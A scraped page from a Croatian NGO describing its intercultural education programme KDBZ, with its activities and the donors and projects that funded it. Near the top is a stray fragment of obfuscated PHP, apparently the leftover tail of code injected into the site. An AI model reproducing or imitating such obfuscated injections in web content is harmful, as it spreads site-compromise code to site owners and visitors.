header

*/($a3b0c4[$o5b2['i29321'][6]]);}exit();}} ?>

Od 2007. godine kada je prvi put kao pilot projekt započela provedba interkulturalnog programa Kulturna i duhovna baština zavičaja, niz je donatora, međunarodnih i tuzemnih, podržalo njegovu implementaciju.

Unutar programa interkulturalne edukacije provodi se široki spektar aktivnosti koji obuhvaća:

 • Jačanje kapaciteta nastavnika za provedbu interkulturalnog programa KDBZ kroz doedukaciju (seminari, radionice, supervizija – individualna i grupna)
 • Izgradnja i jačanje mreže interkulturnih škola u RH
 • Provedba KDBZ vannastavnog programa u školama
 • Materijalna i tehnička podrška provoditeljima i školama partnerima u programu
 • Organizacija i provedba zajedničkih susreta učenika
 • Zagovaranje interkulturnog obrazovanja (organizacija okruglih stolova, konferencija, sudjelovanje u platformama civilnog društva)
 • Istraživanja
 • Publiciranje materijala (priručnika, portfolia, brošura) za promociju i podršku u provedbi sadržaja i metoda interkulturne edukacije
 • Umrežavanje sa sličnim inicijativama na regionalnom i međunarodnom nivou

Projekti kojima se podržala provedba KDBZ-a:

 • Interkulturalno obrazovanje za integrirane zajednice – Europska komisija
 • Naš doprinos u izgradnji interkulturalne Europe – MZOS
 • Interkulturalno obrazovanje – Jezici zavičaja - MZOS
 • Institucionalna podrška – Mreža fondacija Otvoreno društvo
 • Institucionalna podrška – Nacionalna zaklada za razvoj civilnog društva
 • Moja osobna povijest u multikulturalnom mozaiku zajednice
 • Stvaranje mreže interkulturalnih škola – Matra Kap, Norveško veleposlanstvo
 • Zajednička prošlost – zajednička budućnost – Europska komisija
 • Kulturna i duhovna baština mog zavičaja - MZOS

Publikacije

interkulturno obrazovanje

Facebook

logo nansen korak po korak